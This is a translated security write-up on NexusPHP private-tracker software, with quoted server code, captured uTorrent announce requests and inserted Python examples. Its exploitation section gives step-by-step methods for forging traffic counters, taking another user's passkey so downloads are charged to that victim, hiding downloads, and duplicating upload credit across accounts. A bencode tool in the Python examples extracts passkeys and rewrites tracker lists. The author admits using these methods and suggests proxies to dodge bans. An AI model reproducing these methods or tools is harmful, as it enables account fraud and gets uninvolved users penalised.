Analysis and Exploitation of PT Protocol Vulnerabilities

Source: Internet
Author: User

0x00 Background

PT is short for Private Tracker (a private torrent tracker). A PT site keeps statistics of every user's uploads and downloads and derives a sharing ratio from them; it can be thought of as BitTorrent with accounting added. Only users who keep their ratio above the site's threshold keep their accounts. PT is still BitTorrent underneath, but with two obvious changes: first, it is private, serving a small, controlled group of users; second, it counts traffic and grants privileges according to upload volume. DHT must be disabled and membership is restricted, so that within that limited group each downloader can roughly saturate his own bandwidth. PT downloads are also tied to a forum account or a similar binding mechanism, so that users seed back while they download. (Paraphrased from Baidu Baike.)

Take the PT site the author is registered on as an example. Because the tracker keeps statistics of downloads and uploads, every account has an upload ratio. Account level is tied to the sharing ratio, download volume and upload volume; a ratio that is too low leads to a ban or other penalties. But is the PT protocol really trustworthy? The analysis below answers that. Readers not interested in the internals can jump straight to 0x03.

0x01 Server Source Code Analysis

Most PT sites currently run NexusPHP. The author uses NexusPHP v1.5.beta5.20120707 as the example.

The important data the server receives are passkey, info_hash, port, uploaded, downloaded, left and event. They mean the following:

Passkey: uniquely identifies a user.

Info_hash: uniquely identifies the current resource (torrent).

Port: the port on which the client accepts peer connections, as reported by the client.

Uploaded: bytes uploaded.

Downloaded: bytes downloaded.

Left: bytes still to download.

Event: current state (the important values are stopped, completed and started).

The server handles the data update and the cheating detection in ./announce.php.

First, the data update part, lines 231 to 316 of the file. After a series of checks, two lines run:

    $USERUPDATESET[] = "uploaded = uploaded + $upthis";
    $USERUPDATESET[] = "downloaded = downloaded + $truedownthis";

and further down the file executes:

    sql_query("UPDATE users SET ".join(",", $USERUPDATESET)." WHERE id = ".$userid);

After the users table is updated, the stored upload volume is the old upload volume plus this announce's upload delta, and the stored download volume is the old download volume plus this announce's download delta.

Next, the cheating-detection code.

The first check is on the User-Agent. See announce.php line 6:

    $agent = $_SERVER["HTTP_USER_AGENT"];
    block_browser();

block_browser() lives in ./include/functions_announce.php:

    function block_browser()
    {
        $agent = $_SERVER["HTTP_USER_AGENT"];
        if (preg_match("/^Mozilla/", $agent) || preg_match("/^Opera/", $agent) ||
            preg_match("/^Links/", $agent) || preg_match("/^Lynx/", $agent))
            err("Browser access blocked!");

        // Check headers
        if (function_exists('getallheaders')) { // getallheaders() is only supported
                                                // when PHP is installed as an Apache module
            $headers = getallheaders();
            // else
            //     $headers = emu_getallheaders();
            if ($_SERVER["HTTPS"] != "on")
            {
                if (isset($headers["Cookie"]) || isset($headers["Accept-Language"]) ||
                    isset($headers["Accept-Charset"]))
                    err("Anti-Cheater: You cannot use this agent");
            }
        }
    }

So the User-Agent prefixes of the common browsers are rejected outright, and on plain HTTP the Cookie, Accept-Language and Accept-Charset headers are inspected: if any of them is present, the request is rejected as not coming from a BitTorrent client. Note from the code that the header check is skipped entirely when the announce arrives over HTTPS, and also when PHP is not running as an Apache module (no getallheaders()).

The second check is on the port. See announce.php line 35:

    // Check port and connectable
    if (portblacklisted($port))
        err("Port $port is blacklisted.");

portblacklisted(), in ./include/functions_announce.php, restricts the allowed port range. But $port comes straight from the GET query string, so a client can report whatever value it likes.

The user identity and torrent information are then looked up and verified (skipped here). The server also maintains a peer table that records the current session of every active peer; this is what $self refers to below.

The third check is on the announce interval. See announce.php line 163:

    // Min announce time
    if (isset($self) && $self['prevts'] > (TIMENOW - $announce_wait))
        err('There is a minimum announce time of '.$announce_wait.' seconds');

$announce_wait is defined on line 100 as $announce_wait = 30, so two announces for the same session cannot be less than 30 seconds apart. $self is the row from the peer table.

The fourth check is on announce.php lines 219 and 220:

    $upthis = $trueupthis = max(0, $uploaded - $self["uploaded"]);
    $downthis = $truedownthis = max(0, $downloaded - $self["downloaded"]);

$self["uploaded"] and $self["downloaded"] are the values stored in the peer table; $uploaded and $downloaded are the values the server has just received in the GET request. These two lines mean that within an active session only increases are counted: if a reported counter is lower than the stored one, the delta is clamped to zero rather than going negative.

Next comes the most important check, the check_cheater function, in ./include/functions_announce.php.

The comments in check_cheater are clear: it judges the upload speed under different conditions. At the default security level, if the upload speed exceeds 100 MByte/s the account is disabled automatically; a second rule flags an upload of 1 GB at a high speed as possible cheating. If the administrator sets a higher security level, the number of peers currently downloading the torrent is also taken into account: uploading fast while few peers are downloading counts as possible cheating. For each suspected case, if the cheater table has no record for the user within the last 24 hours a new record is added; if one already exists, its hit count is incremented by 1.

This function checks only the upload-related parameters; the download side is not examined at all. Downloads can therefore be forged, or simply never reported.
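The checks walked through above, as an added Python model that is not NexusPHP's code: it restates the User-Agent and header rule, the port check, the 30-second minimum interval, the max(0, delta) accounting and check_cheater's default rule, and runs them over constructed announce sequences whose counters are those of the uTorrent capture in 0x02. Two things are assumptions rather than facts from the article: the port range (portblacklisted() is not reproduced) and the reduction of check_cheater to the single 100 MByte/s rule.

```python
"""Added example, not NexusPHP's code: a Python model of the announce checks
quoted in 0x01, exercised offline over constructed sequences whose counters
follow the 0x02 capture. Assumed, because the article does not give them: the
portblacklisted() range, and check_cheater's default rule taken here as
upload delta / elapsed seconds > 100 MByte/s."""
import re

BLOCKED_UA = re.compile(r"^(Mozilla|Opera|Links|Lynx)")
TELLTALE_HEADERS = ("Cookie", "Accept-Language", "Accept-Charset")
ANNOUNCE_WAIT = 30                    # $announce_wait, announce.php line 100
MAX_UPLOAD_RATE = 100 * 1024 * 1024   # bytes/s, default check_cheater limit
UT_HEADERS = {"User-Agent": "uTorrent/3130(27385)",  # headers as captured in
              "Accept-Encoding": "gzip", "Connection": "Close"}  # 0x02


def port_blacklisted(port: int) -> bool:
    return not 1024 <= port <= 65535  # ASSUMPTION: stand-in for portblacklisted()


class AnnounceError(Exception):
    """Raised where announce.php would call err()."""


class Tracker:
    def __init__(self):
        self.users = {}   # passkey -> {"uploaded", "downloaded", "enabled"}
        self.peers = {}   # (passkey, info_hash) -> (uploaded, downloaded, prevts)

    @staticmethod
    def block_browser(headers: dict, https: bool) -> None:
        if BLOCKED_UA.match(headers.get("User-Agent", "")):
            raise AnnounceError("Browser access blocked!")
        if not https and any(h in headers for h in TELLTALE_HEADERS):
            raise AnnounceError("Anti-Cheater: You cannot use this agent")

    def announce(self, headers: dict, q: dict, now: float, https=False) -> dict:
        """Run the checks in announce.php order; return what gets credited."""
        self.block_browser(headers, https)
        if port_blacklisted(int(q["port"])):
            raise AnnounceError(f"Port {q['port']} is blacklisted.")
        user = self.users.setdefault(
            q["passkey"], {"uploaded": 0, "downloaded": 0, "enabled": True})
        key = (q["passkey"], q["info_hash"])
        row = self.peers.get(key)                  # $self: the peer-table row
        if row is not None and row[2] > now - ANNOUNCE_WAIT:
            raise AnnounceError(
                f"There is a minimum announce time of {ANNOUNCE_WAIT} seconds")
        uploaded, downloaded = int(q["uploaded"]), int(q["downloaded"])
        upthis, downthis, flagged = 0, 0, False
        if row is not None:
            # lines 219-220: within a session only increases are counted
            upthis = max(0, uploaded - row[0])
            downthis = max(0, downloaded - row[1])
            # check_cheater rate-checks the upload side only; downthis is
            # credited unexamined, which is the gap the article points out
            if upthis / max(now - row[2], 1.0) > MAX_UPLOAD_RATE:
                user["enabled"] = False
                flagged = True
            user["uploaded"] += upthis        # uploaded = uploaded + $upthis
            user["downloaded"] += downthis    # downloaded = downloaded + $truedownthis
        if q.get("event") == "stopped":
            self.peers.pop(key, None)         # stopped: row leaves the peer table
        else:
            self.peers[key] = (uploaded, downloaded, now)
        return {"upthis": upthis, "downthis": downthis, "flagged": flagged}


def _q(passkey, uploaded, downloaded, event=None):
    q = {"passkey": passkey, "info_hash": "h" * 20, "port": "41677",
         "uploaded": str(uploaded), "downloaded": str(downloaded)}
    return {**q, "event": event} if event else q


def _rejected(tracker, headers, q, now) -> bool:
    try:
        tracker.announce(headers, q, now)
        return False
    except AnnounceError:
        return True


def run_scenarios() -> dict:
    """Constructed announce sequences against one tracker instance."""
    t, t0, out = Tracker(), 1_000_000.0, {}
    # honest uTorrent session with the counters captured in 0x02
    t.announce(UT_HEADERS, _q("honest", 0, 0, "started"), t0)
    t.announce(UT_HEADERS, _q("honest", 0, 52953088), t0 + 1800)
    t.announce(UT_HEADERS, _q("honest", 0, 137201853, "completed"), t0 + 3600)
    t.announce(UT_HEADERS, _q("honest", 7438336, 137201853, "stopped"), t0 + 5400)
    out["honest"] = dict(t.users["honest"])
    # a Cookie header is refused before any accounting happens
    out["cookie_rejected"] = _rejected(
        t, {**UT_HEADERS, "Cookie": "a=1"}, _q("honest", 0, 0), t0 + 9000)
    # re-announcing 10 s into a session trips the minimum interval
    t.announce(UT_HEADERS, _q("fast", 0, 0, "started"), t0)
    out["interval_rejected"] = _rejected(t, UT_HEADERS, _q("fast", 0, 1000), t0 + 10)
    # forged counters: 10 GiB "downloaded" in 30 s is credited without a flag,
    # while the same jump on the upload side disables the account
    t.announce(UT_HEADERS, _q("dl_forger", 0, 0, "started"), t0)
    out["download_burst"] = t.announce(UT_HEADERS, _q("dl_forger", 0, 10 * 2**30), t0 + 30)
    t.announce(UT_HEADERS, _q("ul_forger", 0, 0, "started"), t0)
    out["upload_burst"] = t.announce(UT_HEADERS, _q("ul_forger", 10 * 2**30, 0), t0 + 30)
    out["ul_forger_enabled"] = t.users["ul_forger"]["enabled"]
    return out
```

run_scenarios() returns one entry per scenario. The honest session ends with exactly the totals of the capture; the Cookie and the 10-second re-announce are refused before any counter is touched; and the two forged bursts show the asymmetry the article describes: 10 GiB claimed as downloaded in 30 seconds is credited silently, while the same figure claimed as uploaded disables the account.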

That covers the cheating-detection code. Finally, the values of the current state (event).

stopped corresponds to quitting the client or stopping the download or the seeding; the server removes your row from the peer table.

completed means the current torrent has finished downloading, and the torrent shows as completed on the site. If completed is never sent, the torrent is treated as still downloading or as deleted, and stays in the "unfinished" state.

 

0x02 Client Packet Capture Verification

The author tested with uTorrent 3.1.3.

First, configure a proxy in uTorrent so that Burp can capture the traffic. Only the connection to the tracker needs to pass through the proxy; enabling the proxy for hostname lookups is enough to capture the announce requests.

Download the torrent and load it. The tracker list is shown under the advanced options; the tracker URL points at the server script analysed in 0x01. Click OK to start the download and capture the packets with Burp.

The first request goes to scrape.php by GET; this script checks whether the torrent exists.

    GET /scrape.php?passkey=xxx&info_hash=%d5%bb%80%2a%c3v%ac%3d%5e%01%90%7fu%9c%a4%bc%afK7%81&info_hash=%12%3fP%c3%a5%8c5M%d7%9e%1b%40Q%cb%2a%14%bf%a7%f09 HTTP/1.1
    Host: xxx
    User-Agent: uTorrent/3130(27385)
    Accept-Encoding: gzip
    Connection: Close

The second request is sent once the resource exists. It goes to announce.php, the main server script, and so do all later requests. At this point the torrent shows as incomplete on the site.

    GET /announce.php?passkey=xxx&info_hash=%d5%bb%80%2a%c3v%ac%3d%5e%01%90%7fu%9c%a4%bc%afK7%81&peer_id=-UT3130-%f9j%b7J%24%e6%b9%85%9a%d1zv&port=41677&uploaded=0&downloaded=0&left=137201853&corrupt=0&key=03731F6C&event=started&numwant=200&compact=1&no_peer_id=1&ipv6=xxxx HTTP/1.1
    Host: xxxx
    User-Agent: uTorrent/3130(27385)
    Accept-Encoding: gzip
    Connection: Close

This request carries event=started, uploaded=0, downloaded=0 and left=137201853.

Some time later:

    GET /announce.php?passkey=xxx&info_hash=%d5%bb%80%2a%c3v%ac%3d%5e%01%90%7fu%9c%a4%bc%afK7%81&peer_id=-UT3130-%f9j%b7J%24%e6%b9%85%9a%d1zv&port=41677&uploaded=0&downloaded=52953088&left=83036349&corrupt=0&key=03731F6C&numwant=200&compact=1&no_peer_id=1&ipv6=xxx HTTP/1.1
    Host: xxx
    User-Agent: uTorrent/3130(27385)
    Accept-Encoding: gzip
    Connection: Close

Now the counters carry real traffic: uploaded=0, downloaded=52953088, left=83036349. There is no event parameter in a routine update.

When the download finishes, event=completed is sent and the torrent shows as complete on the site:

    GET /announce.php?passkey=xxx&info_hash=%d5%bb%80%2a%c3v%ac%3d%5e%01%90%7fu%9c%a4%bc%afK7%81&peer_id=-UT3130-%f9j%b7J%24%e6%b9%85%9a%d1zv&port=41677&uploaded=0&downloaded=137201853&left=0&corrupt=0&key=03731F6C&event=completed&numwant=200&compact=1&no_peer_id=1&ipv6=xxx HTTP/1.1
    Host: xxx
    User-Agent: uTorrent/3130(27385)
    Accept-Encoding: gzip
    Connection: Close

When the uTorrent client is closed, the following request is sent:

    GET /announce.php?passkey=xxx&info_hash=%d5%bb%80%2a%c3v%ac%3d%5e%01%90%7fu%9c%a4%bc%afK7%81&peer_id=-UT3130-%f9j%b7J%24%e6%b9%85%9a%d1zv&port=41677&uploaded=7438336&downloaded=137201853&left=0&corrupt=0&key=03731F6C&event=stopped&numwant=0&compact=1&no_peer_id=1 HTTP/1.1
    Host: xxx
    User-Agent: uTorrent/3130(27385)
    Accept-Encoding: gzip
    Connection: Close

Here event=stopped, and the session's upload so far (uploaded=7438336) is reported for the last time.

Looking at these requests together: the User-Agent is uTorrent/3130(27385) and there is no Cookie, Accept-Language or Accept-Charset header, so the first server check passes. The port is within the range the server allows, so the second check passes. Comparing the capture times, the announces are spaced at the tracker's update interval (30 minutes once the download has finished), which guarantees enough peers at any point of the download while keeping the load on the tracker low; the third check passes. The fourth check and check_cheater act on the server side and cannot be observed from the client, so they are not discussed further here.
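As an added example, not part of the original write-up, the captured announce requests above parsed the way the tracker has to parse them, followed by a replay of the session's accounting. The point a hand parser makes clearer than the raw capture: info_hash and peer_id are percent-encoded binary (20 bytes each), so they must be decoded to bytes rather than text, and everything else the tracker credits is an integer the client chose to send. The request lines are the captured ones with host, passkey and IPv6 address redacted as in the article; the capture timestamps were not published, so timing is not modelled.

```python
"""Added example, not from the article: parse the announce requests captured
in 0x02 the way the tracker must, then replay the session's accounting.
info_hash and peer_id are percent-encoded raw bytes (20 each), so they are
decoded with unquote_to_bytes, not as text. The request lines are the
captured ones, with host, passkey and IPv6 address redacted as in the
article; capture timestamps were not published and are not modelled."""
from urllib.parse import unquote_to_bytes

INFO_HASH = "%d5%bb%80%2a%c3v%ac%3d%5e%01%90%7fu%9c%a4%bc%afK7%81"
PEER_ID = "-UT3130-%f9j%b7J%24%e6%b9%85%9a%d1zv"
HEAD = f"GET /announce.php?passkey=xxx&info_hash={INFO_HASH}&peer_id={PEER_ID}"
CAPTURED = [  # the four announces of one uTorrent session, in capture order
    HEAD + "&port=41677&uploaded=0&downloaded=0&left=137201853&corrupt=0"
           "&key=03731F6C&event=started&numwant=200&compact=1&no_peer_id=1&ipv6=xxx HTTP/1.1",
    HEAD + "&port=41677&uploaded=0&downloaded=52953088&left=83036349&corrupt=0"
           "&key=03731F6C&numwant=200&compact=1&no_peer_id=1&ipv6=xxx HTTP/1.1",
    HEAD + "&port=41677&uploaded=0&downloaded=137201853&left=0&corrupt=0"
           "&key=03731F6C&event=completed&numwant=200&compact=1&no_peer_id=1&ipv6=xxx HTTP/1.1",
    HEAD + "&port=41677&uploaded=7438336&downloaded=137201853&left=0&corrupt=0"
           "&key=03731F6C&event=stopped&numwant=0&compact=1&no_peer_id=1 HTTP/1.1",
]
BINARY_FIELDS = ("info_hash", "peer_id")          # 20 raw bytes each
INT_FIELDS = ("port", "uploaded", "downloaded", "left", "corrupt", "numwant")


def parse_announce(request_line: str) -> dict:
    """Decode 'GET /announce.php?... HTTP/1.1' into typed announce fields."""
    method, target, _version = request_line.split(" ")
    path, _, query = target.partition("?")
    if method != "GET" or path != "/announce.php":
        raise ValueError("not an announce request")
    fields = {}
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_to_bytes(raw)
        if name in BINARY_FIELDS:
            if len(value) != 20:
                raise ValueError(f"{name} must be 20 bytes, got {len(value)}")
            fields[name] = value
        elif name in INT_FIELDS:
            fields[name] = int(value)
        else:
            fields[name] = value.decode("ascii")
    return fields


def replay_session(request_lines) -> list:
    """Credit each announce as announce.php does: max(0, reported - stored)."""
    session = stored = None
    credited = []
    for line in request_lines:
        f = parse_announce(line)
        ident = (f["passkey"], f["info_hash"], f["peer_id"])
        if session not in (None, ident):
            raise ValueError("announce belongs to a different session")
        session = ident
        upthis = downthis = 0
        if stored is not None:  # the first announce only creates the peer row
            upthis = max(0, f["uploaded"] - stored[0])
            downthis = max(0, f["downloaded"] - stored[1])
        credited.append({"event": f.get("event", ""), "upthis": upthis,
                         "downthis": downthis, "left": f["left"]})
        stored = (f["uploaded"], f["downloaded"])
    return credited


def session_totals(credited) -> tuple:
    """What the users table gains over the whole session: (uploaded, downloaded)."""
    return (sum(c["upthis"] for c in credited), sum(c["downthis"] for c in credited))
```

replay_session(CAPTURED) credits 0, 52953088, 84248765 and 0 bytes of download and 0, 0, 0 and 7438336 bytes of upload for the four announces, i.e. exactly the final counters of the capture. One caveat the replay makes visible: the tracker never reconciles downloaded with left, and in the second announce the two do not even add up to the torrent's 137201853 bytes (52953088 + 83036349 = 135989437); both numbers are simply whatever the client reports.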

 

0x03 PT Protocol Vulnerabilities and Exploitation

From the analysis above, the weaknesses of the PT protocol can be summarised as follows.

1. The client reports its upload and download counters in a plain GET request, so they can be forged.

2. The tracker identifies a user by the passkey alone. The passkey is generated as md5(username + time + passhash). It is embedded in every torrent downloaded from the site: it cannot be forged, but it can be extracted.

3. Cheating detection covers only the uploaded counter and never the downloaded one, so downloads can be hidden or faked.

4. A torrent can carry several trackers, and a tracker does not (and cannot) see the others. On every update the client sends the same upload and download counters to every tracker in the list, so the same traffic can be credited several times.

5. Every announce is handled by the tracker with several database queries, which makes it a target for CC (HTTP flood) attacks; a successful one takes the whole server down.

To exploit the first weakness, send announce requests by hand: as long as the checks described above are satisfied, they are accepted. The thing to watch is the number of peers currently downloading the torrent, which matters at the higher security levels; that number can be read from the torrent's page on the site and extracted with a regular expression. The author has not turned this into a tool.

For the second weakness, ask an unsuspecting user for a torrent he has downloaded, load it in uTorrent, open Advanced to see the tracker URL and note its passkey. Later, when you want to download a torrent without it counting against your own account, replace the passkey in your torrent's tracker URL with the victim's. Every update then carries the victim's identity, and the download is booked to the victim. Once the download is complete, restart uTorrent so that the session counters are reset, switch the tracker back to your own passkey, and the upload is credited to your account.

For the third weakness, remove the tracker once it has delivered the peer list at the start of the download. The peers keep sending data to you, but no traffic report reaches the server. After the download is complete, restart uTorrent and add the tracker back to seed, and the upload is credited to your account. (Use with caution: at a high security level this can get other users banned!)

For the fourth weakness, you need several cooperating friends. After a torrent has been downloaded by whatever means, restart uTorrent and add the tracker URLs of your own account and of the other users to the tracker list. One person seeds, and every account in the list receives the upload credit.
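The two manipulations of the torrent file described for the second and fourth weaknesses, done on the .torrent itself rather than through the uTorrent dialog, as an added example that is not part of the original article. It carries a minimal bencode codec (the .torrent format), extracts the passkey from each tracker URL, and rewrites the tracker list with one tracker per tier. The torrent, host name and passkeys below are constructed placeholders; the passkey is assumed to be the 32 hexadecimal characters of an MD5 digest, as the article describes its generation. Because info_hash is SHA-1 over the bencoded info dictionary only, rewriting the trackers leaves the torrent identifying the same resource, which the example verifies.

```python
"""Added example, not from the article: a minimal bencode codec used to pull
the passkey out of a PT torrent's tracker URL and to rewrite the tracker
list, i.e. the manual uTorrent steps of points 2 and 4 in 0x03 done on the
.torrent file itself. The torrent here is constructed; host name and
passkeys are placeholders, and the passkey is assumed to be the 32 hex
characters of an MD5 digest as the article describes."""
import hashlib
import re


def bdecode(data: bytes):
    """Decode one complete bencoded value (ints, byte strings, lists, dicts)."""
    def _dec(i):
        c = data[i:i + 1]
        if c == b"i":
            end = data.index(b"e", i)
            return int(data[i + 1:end]), end + 1
        if c in (b"l", b"d"):
            i, items = i + 1, []
            while data[i:i + 1] != b"e":
                v, i = _dec(i)
                items.append(v)
            return (items if c == b"l" else dict(zip(items[::2], items[1::2]))), i + 1
        colon = data.index(b":", i)             # byte string: <len>:<bytes>
        n = int(data[i:colon])
        return data[colon + 1:colon + 1 + n], colon + 1 + n
    value, consumed = _dec(0)
    if consumed != len(data):
        raise ValueError("trailing bytes after bencoded value")
    return value


def bencode(value) -> bytes:
    if isinstance(value, bool) or not isinstance(value, (int, bytes, list, dict)):
        raise TypeError(f"cannot bencode {type(value).__name__}")
    if isinstance(value, int):
        return b"i%de" % value
    if isinstance(value, bytes):
        return b"%d:%s" % (len(value), value)
    if isinstance(value, list):
        return b"l" + b"".join(map(bencode, value)) + b"e"
    return b"d" + b"".join(bencode(k) + bencode(value[k]) for k in sorted(value)) + b"e"


def info_hash(torrent: dict) -> str:
    """info_hash is SHA-1 over the bencoded info dict; trackers are not part of it."""
    return hashlib.sha1(bencode(torrent[b"info"])).hexdigest()


def tracker_urls(torrent: dict) -> list:
    """announce first, then every announce-list tier (BEP 12), without duplicates."""
    urls = [torrent[b"announce"]] if b"announce" in torrent else []
    for tier in torrent.get(b"announce-list", []):
        for u in tier:
            if u not in urls:
                urls.append(u)
    return urls


PASSKEY_RE = re.compile(rb"[?&]passkey=([0-9a-fA-F]{32})(?:&|$)")


def extract_passkeys(torrent: dict) -> list:
    """Point 2 of 0x03: the passkey sits in plain text in every tracker URL."""
    found = []
    for url in tracker_urls(torrent):
        m = PASSKEY_RE.search(url)
        if m:
            found.append(m.group(1).decode())
    return found


def with_trackers(torrent: dict, urls: list) -> dict:
    """Point 4 of 0x03: a copy of the torrent announcing to every URL in urls.

    Each URL gets its own tier, so a BEP 12 client announces to all of them
    instead of to the first working tracker of a single tier.
    """
    new = dict(torrent)
    new[b"announce"] = urls[0]
    new[b"announce-list"] = [[u] for u in urls]
    return new


def demo() -> dict:
    """Constructed PT-style torrent: swap one tracker URL for two."""
    host = b"http://tracker.example.invalid/announce.php?passkey="  # placeholder
    victim, mine = host + b"a" * 32, host + b"b" * 32                # placeholders
    info = {b"name": b"example.iso", b"piece length": 262144,
            b"length": 137201853, b"pieces": b"\x00" * 20, b"private": 1}
    original = bdecode(bencode({b"announce": victim, b"info": info}))
    rewritten = bdecode(bencode(with_trackers(original, [mine, victim])))
    return {"before": extract_passkeys(original), "after": extract_passkeys(rewritten),
            "same_info_hash": info_hash(original) == info_hash(rewritten)}
```

demo() round-trips the constructed torrent through the codec, reports the passkey found before the rewrite and the two found after it, and confirms that info_hash is unchanged. To run it on a real file, read the bytes, call bdecode, and write bencode(with_trackers(...)) back out; the private flag and everything else under the info key are left exactly as they were.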

The fifth weakness is not explained here: CC attacks are illegal.

 

0x04 Postscript

The author found this a long time ago but never wrote it up in detail; after all, cheating runs against the spirit of sharing. In the meantime I did try it a few times, and on one occasion overdid it, which got the IP addresses under my account banned; after that I kept a low profile. A further development is to use a proxy to get around the IP restriction and quietly download and upload. Unless there is a special reason, I hope you will follow the PT rules normally and enjoy sharing.

The method above is for research only. Whatever happens if it is used, the consequences are your own and have nothing to do with the author.
